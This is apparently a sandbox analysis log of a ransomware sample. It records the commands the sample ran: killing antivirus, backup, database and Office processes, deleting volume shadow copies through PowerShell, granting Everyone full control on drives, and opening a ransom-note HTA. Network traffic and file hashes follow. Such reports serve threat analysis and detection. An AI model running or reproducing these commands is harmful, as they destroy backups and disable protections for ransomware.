C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SYSTEM32\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\SYSTEM32\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
C:\Windows\SYSTEM32\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\arp.exe
"arp" -a
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.179.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 196.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/3512-1-0x00007FFCBB183000-0x00007FFCBB185000-memory.dmp
memory/3512-0-0x0000000000B00000-0x0000000000B4E000-memory.dmp
memory/3512-2-0x00007FFCBB180000-0x00007FFCBBC41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkl521li.iiz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/496-7-0x0000018FE4D40000-0x0000018FE4D62000-memory.dmp
memory/3512-457-0x00007FFCBB183000-0x00007FFCBB185000-memory.dmp
memory/3512-458-0x00007FFCBB180000-0x00007FFCBBC41000-memory.dmp
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
| MD5 | fce3819bef51d6be4feebefbe4a522ae |
| SHA1 | 614063f71f644bb25ad5dc96c4f43010d0300b19 |
| SHA256 | e8c2e5af1b537d0348fce973b89f6a30e35e15a79050bd07d4109800775f30b0 |
| SHA512 | 3b3f32a350105f48a526f60b6178b4f306cfaedcb94e691473edfefa0095bf33da2bcbf879f16b7b6b2e83d0ee0ff9eee4a2962e01d8489e268c4bd313b33a6e |
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | f363f899e5ed486f5885501148292bff |
| SHA1 | a709ef31c515de039fb25ac582072bcf673ecdf7 |
| SHA256 | 2b72c6c6966a73338c551bc597eb45bb48940687575f3bde9e091fbbe538cfa4 |
| SHA512 | 242733b3fbe41221351474b595ac54e40b96a65f308a3c84873c8a2af332450f5b529ff058646a14857c94286932baf400e6fcd8fe3a15f5978e5e516757057a |